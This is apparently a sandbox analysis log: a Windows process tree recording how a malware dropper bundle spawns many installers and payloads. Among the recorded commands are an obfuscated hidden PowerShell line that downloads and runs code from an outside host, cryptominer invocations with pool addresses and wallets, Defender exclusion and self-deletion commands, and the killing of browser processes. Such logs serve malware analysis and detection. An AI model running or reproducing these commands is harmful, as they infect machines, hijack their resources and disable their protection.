C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"9⤵PID:7824
-
C:\Users\Admin\AppData\Local\Temp\4WEO6VS480\setups.exe"C:\Users\Admin\AppData\Local\Temp\4WEO6VS480\setups.exe" ll10⤵PID:11988
-
C:\Users\Admin\AppData\Local\Temp\is-8FG0M.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-8FG0M.tmp\setups.tmp" /SL5="$40652,635399,250368,C:\Users\Admin\AppData\Local\Temp\4WEO6VS480\setups.exe" ll11⤵PID:11028
-
-
-
C:\Users\Admin\AppData\Local\Temp\V39FND9C7K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V39FND9C7K\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:10848
-
C:\Users\Admin\AppData\Local\Temp\V39FND9C7K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V39FND9C7K\multitimer.exe" 1 3.1617513584.60694c703812e 10111⤵PID:9520
-
C:\Users\Admin\AppData\Local\Temp\V39FND9C7K\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V39FND9C7K\multitimer.exe" 2 3.1617513584.60694c703812e12⤵PID:5296
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"9⤵PID:6820
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:7740
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:8712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"9⤵PID:12036
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"10⤵PID:6156
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install11⤵PID:9948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"9⤵PID:9312
-
C:\Users\Admin\AppData\Roaming\9889.tmp.exe"C:\Users\Admin\AppData\Roaming\9889.tmp.exe"10⤵PID:6184
-
-
C:\Users\Admin\AppData\Roaming\BFAA.tmp.exe"C:\Users\Admin\AppData\Roaming\BFAA.tmp.exe"10⤵PID:4600
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kiaalrbg.n0t\app.exe /8-2222 & exit7⤵PID:10956
-
C:\Users\Admin\AppData\Local\Temp\kiaalrbg.n0t\app.exeC:\Users\Admin\AppData\Local\Temp\kiaalrbg.n0t\app.exe /8-22228⤵PID:12280
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\is-KL0FF.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-KL0FF.tmp\lylal220.tmp" /SL5="$30288,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\is-HG9F5.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-HG9F5.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:5160
-
C:\Program Files\Windows Portable Devices\LCAXIVEBDA\irecord.exe"C:\Program Files\Windows Portable Devices\LCAXIVEBDA\irecord.exe" /VERYSILENT6⤵PID:2568
-
C:\Users\Admin\AppData\Local\Temp\is-M4QCB.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-M4QCB.tmp\irecord.tmp" /SL5="$4026E,6265333,408064,C:\Program Files\Windows Portable Devices\LCAXIVEBDA\irecord.exe" /VERYSILENT7⤵PID:6240
-
-
-
C:\Users\Admin\AppData\Local\Temp\9f-be3f0-f82-7a5b3-e6acd3026800d\Xaevavizhyko.exe"C:\Users\Admin\AppData\Local\Temp\9f-be3f0-f82-7a5b3-e6acd3026800d\Xaevavizhyko.exe"6⤵PID:6176
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jn1whcs5.pcf\md6_6ydj.exe & exit7⤵PID:10820
-
C:\Users\Admin\AppData\Local\Temp\jn1whcs5.pcf\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\jn1whcs5.pcf\md6_6ydj.exe8⤵PID:12104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ykdraesj.enf\askinstall31.exe & exit7⤵PID:11220
-
C:\Users\Admin\AppData\Local\Temp\ykdraesj.enf\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ykdraesj.enf\askinstall31.exe8⤵PID:1332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hwwbaupb.1in\toolspab1.exe & exit7⤵PID:11412
-
C:\Users\Admin\AppData\Local\Temp\hwwbaupb.1in\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hwwbaupb.1in\toolspab1.exe8⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\hwwbaupb.1in\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hwwbaupb.1in\toolspab1.exe9⤵PID:11668
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ox1kdxe.wb4\GcleanerWW.exe /mixone & exit7⤵PID:11772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w1nj2l44.eih\setup_10.2_mix.exe & exit7⤵PID:7212
-
C:\Users\Admin\AppData\Local\Temp\w1nj2l44.eih\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\w1nj2l44.eih\setup_10.2_mix.exe8⤵PID:7868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\el11z4qa.zrq\file.exe & exit7⤵PID:8736
-
C:\Users\Admin\AppData\Local\Temp\el11z4qa.zrq\file.exeC:\Users\Admin\AppData\Local\Temp\el11z4qa.zrq\file.exe8⤵PID:8240
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:11796
-
C:\Users\Admin\AppData\Local\Temp\2ZFMXMO7RN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2ZFMXMO7RN\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:9276
-
C:\Users\Admin\AppData\Local\Temp\2ZFMXMO7RN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2ZFMXMO7RN\multitimer.exe" 1 3.1617513525.60694c3525e2a 10111⤵PID:9416
-
C:\Users\Admin\AppData\Local\Temp\2ZFMXMO7RN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\2ZFMXMO7RN\multitimer.exe" 2 3.1617513525.60694c3525e2a12⤵PID:6980
-
C:\Users\Admin\AppData\Local\Temp\ec3acjbyidx\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ec3acjbyidx\cpyrix.exe" /VERYSILENT13⤵PID:10216
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:6028
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:9240
-
-
-
C:\Users\Admin\AppData\Local\Temp\s1hlkqifzg4\ryh5lml2hhn.exe"C:\Users\Admin\AppData\Local\Temp\s1hlkqifzg4\ryh5lml2hhn.exe" /ustwo INSTALL13⤵PID:11164
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ryh5lml2hhn.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\s1hlkqifzg4\ryh5lml2hhn.exe" & exit14⤵PID:10840
-
-
-
C:\Users\Admin\AppData\Local\Temp\z3frebaurcx\app.exe"C:\Users\Admin\AppData\Local\Temp\z3frebaurcx\app.exe" /8-2313⤵PID:7928
-
-
C:\Users\Admin\AppData\Local\Temp\44ymzb1iv5u\vict.exe"C:\Users\Admin\AppData\Local\Temp\44ymzb1iv5u\vict.exe" /VERYSILENT /id=53513⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\is-F7DDF.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-F7DDF.tmp\vict.tmp" /SL5="$206CE,870426,780800,C:\Users\Admin\AppData\Local\Temp\44ymzb1iv5u\vict.exe" /VERYSILENT /id=53514⤵PID:7352
-
C:\Users\Admin\AppData\Local\Temp\is-5NBDM.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-5NBDM.tmp\win1host.exe" 53515⤵PID:11796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mtlt5cjvqjj\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\mtlt5cjvqjj\Setup3310.exe" /Verysilent /subid=57713⤵PID:7880
-
C:\Users\Admin\AppData\Local\Temp\is-QB1V3.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-QB1V3.tmp\Setup3310.tmp" /SL5="$306D4,138429,56832,C:\Users\Admin\AppData\Local\Temp\mtlt5cjvqjj\Setup3310.exe" /Verysilent /subid=57714⤵PID:6052
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Q9TISZPKYR\setups.exe"C:\Users\Admin\AppData\Local\Temp\Q9TISZPKYR\setups.exe" ll10⤵PID:8256
-
C:\Users\Admin\AppData\Local\Temp\is-657EK.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-657EK.tmp\setups.tmp" /SL5="$40598,635399,250368,C:\Users\Admin\AppData\Local\Temp\Q9TISZPKYR\setups.exe" ll11⤵PID:9480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:9384
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:10332
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:3748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"9⤵PID:7452
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"10⤵PID:4220
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install11⤵PID:8796
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:8008
-
C:\Users\Admin\AppData\Roaming\F004.tmp.exe"C:\Users\Admin\AppData\Roaming\F004.tmp.exe"10⤵PID:9984
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:8552
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:7596
-
-
-
C:\Users\Admin\AppData\Roaming\FBAE.tmp.exe"C:\Users\Admin\AppData\Roaming\FBAE.tmp.exe"10⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:11452
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:8960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:11608
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2cpnud5v.mw1\app.exe /8-2222 & exit7⤵PID:5956
-
C:\Users\Admin\AppData\Local\Temp\2cpnud5v.mw1\app.exeC:\Users\Admin\AppData\Local\Temp\2cpnud5v.mw1\app.exe /8-22228⤵PID:7364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\we5g41ew.txf\Four.exe & exit7⤵PID:6460
-
C:\Users\Admin\AppData\Local\Temp\we5g41ew.txf\Four.exeC:\Users\Admin\AppData\Local\Temp\we5g41ew.txf\Four.exe8⤵PID:10692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\67-fdb1e-51c-411b4-c4932c4156729\Saqukupaexi.exe"C:\Users\Admin\AppData\Local\Temp\67-fdb1e-51c-411b4-c4932c4156729\Saqukupaexi.exe"6⤵PID:5888
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"3⤵PID:4712
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:6300
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:4124
-
C:\Users\Admin\AppData\Local\Temp\HIV7169GYU\setups.exe"C:\Users\Admin\AppData\Local\Temp\HIV7169GYU\setups.exe" ll4⤵PID:4344
-
C:\Users\Admin\AppData\Local\Temp\is-GGA0O.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-GGA0O.tmp\setups.tmp" /SL5="$3032A,635399,250368,C:\Users\Admin\AppData\Local\Temp\HIV7169GYU\setups.exe" ll5⤵PID:3972
-
-
-
C:\Users\Admin\AppData\Local\Temp\X6POMMHFXA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X6POMMHFXA\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:4164
-
C:\Users\Admin\AppData\Local\Temp\X6POMMHFXA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X6POMMHFXA\multitimer.exe" 1 3.1617513385.60694ba9b21fb 1035⤵PID:6308
-
C:\Users\Admin\AppData\Local\Temp\X6POMMHFXA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X6POMMHFXA\multitimer.exe" 2 3.1617513385.60694ba9b21fb6⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\htrmygo4imb\vict.exe"C:\Users\Admin\AppData\Local\Temp\htrmygo4imb\vict.exe" /VERYSILENT /id=5357⤵PID:11820
-
C:\Users\Admin\AppData\Local\Temp\is-L2FOK.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-L2FOK.tmp\vict.tmp" /SL5="$8027E,870426,780800,C:\Users\Admin\AppData\Local\Temp\htrmygo4imb\vict.exe" /VERYSILENT /id=5358⤵PID:12020
-
C:\Users\Admin\AppData\Local\Temp\is-HEEDC.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-HEEDC.tmp\win1host.exe" 5359⤵PID:5236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dc4xp0yd2fz\vpn.exe"C:\Users\Admin\AppData\Local\Temp\dc4xp0yd2fz\vpn.exe" /silent /subid=4827⤵PID:11856
-
C:\Users\Admin\AppData\Local\Temp\is-532L1.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-532L1.tmp\vpn.tmp" /SL5="$60190,15170975,270336,C:\Users\Admin\AppData\Local\Temp\dc4xp0yd2fz\vpn.exe" /silent /subid=4828⤵PID:11996
-
-
-
C:\Users\Admin\AppData\Local\Temp\2i2lu10wh3k\snovsxavqyr.exe"C:\Users\Admin\AppData\Local\Temp\2i2lu10wh3k\snovsxavqyr.exe" /ustwo INSTALL7⤵PID:11840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "snovsxavqyr.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2i2lu10wh3k\snovsxavqyr.exe" & exit8⤵PID:7976
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "snovsxavqyr.exe" /f9⤵
- Kills process with taskkill
PID:8404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\od2asbbqfza\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\od2asbbqfza\Setup3310.exe" /Verysilent /subid=5777⤵PID:11952
-
C:\Users\Admin\AppData\Local\Temp\is-PH82V.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-PH82V.tmp\Setup3310.tmp" /SL5="$60264,138429,56832,C:\Users\Admin\AppData\Local\Temp\od2asbbqfza\Setup3310.exe" /Verysilent /subid=5778⤵PID:12076
-
C:\Users\Admin\AppData\Local\Temp\is-0G655.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0G655.tmp\Setup.exe" /Verysilent9⤵PID:7368
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\negxqsnmrpl\app.exe"C:\Users\Admin\AppData\Local\Temp\negxqsnmrpl\app.exe" /8-237⤵PID:11964
-
-
C:\Users\Admin\AppData\Local\Temp\pik3b5nn1d5\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\pik3b5nn1d5\cpyrix.exe" /VERYSILENT7⤵PID:12124
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:9988
-
C:\Users\Admin\AppData\Local\Temp\6b1f883f-9723-4bd6-9c9c-5b9b9d438a58\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6b1f883f-9723-4bd6-9c9c-5b9b9d438a58\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6b1f883f-9723-4bd6-9c9c-5b9b9d438a58\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:10604
-
C:\Users\Admin\AppData\Local\Temp\6b1f883f-9723-4bd6-9c9c-5b9b9d438a58\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\6b1f883f-9723-4bd6-9c9c-5b9b9d438a58\AdvancedRun.exe" /SpecialRun 4101d8 1060410⤵PID:10972
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force9⤵PID:4976
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 19⤵PID:5972
-
C:\Windows\SysWOW64\timeout.exetimeout 110⤵
- Delays execution with timeout.exe
PID:5692
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"9⤵PID:7568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9988 -s 15249⤵
- Program crash
PID:7684
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:10148
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵PID:10740
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:5640
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:5052
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:2424
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:5416
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:2580
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:2528
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:5244
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BM9NE.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-BM9NE.tmp\vict.tmp" /SL5="$30310,870426,780800,C:\Users\Admin\AppData\Local\Temp\m5fmzrrfhqu\vict.exe" /VERYSILENT /id=5351⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\is-OUFS4.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-OUFS4.tmp\win1host.exe" 5352⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\Q64OS37SL.exe"C:\Users\Admin\AppData\Local\Temp\Q64OS37SL.exe"3⤵PID:9740
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵PID:10008
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵PID:9964
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵PID:10684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-8V17P.tmp\okrflsnls4d.tmp"C:\Users\Admin\AppData\Local\Temp\is-8V17P.tmp\okrflsnls4d.tmp" /SL5="$10336,2592217,780800,C:\Users\Admin\AppData\Local\Temp\acct1ulg3t1\okrflsnls4d.exe" /VERYSILENT1⤵PID:5480
-
C:\Users\Admin\AppData\Local\Temp\is-17GQC.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-17GQC.tmp\winlthsth.exe"2⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\9BCegIrD4.exe"C:\Users\Admin\AppData\Local\Temp\9BCegIrD4.exe"3⤵PID:8316
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵PID:8560
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵PID:9004
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵PID:8824
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:5628
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:8776
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5784
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 37816FFC33771559B3214610A0663812 C2⤵PID:4944
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A3F57501656F089969918B8174B3DD692⤵PID:4848
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1896
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6168
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4812
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:11884
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:5248
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1de30b20-8f2c-7540-afd1-632fb6fa3668}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:5956
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"2⤵PID:12180
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:4796
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6640
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11116
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6280
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:10544
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:10928
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:11032
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7312
-
C:\Users\Admin\AppData\Local\Temp\38C.exeC:\Users\Admin\AppData\Local\Temp\38C.exe1⤵PID:10408
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8864
-
C:\Users\Admin\AppData\Local\Temp\1149.exeC:\Users\Admin\AppData\Local\Temp\1149.exe1⤵PID:9168
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:12096
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\af45499077bb4f0f8e490943bef16c82 /t 10568 /p 88641⤵PID:6068
-
C:\Users\Admin\AppData\Local\Temp\8522.exeC:\Users\Admin\AppData\Local\Temp\8522.exe1⤵PID:9884
-
C:\Users\Admin\AppData\Local\Temp\9A70.exeC:\Users\Admin\AppData\Local\Temp\9A70.exe1⤵PID:4904
-
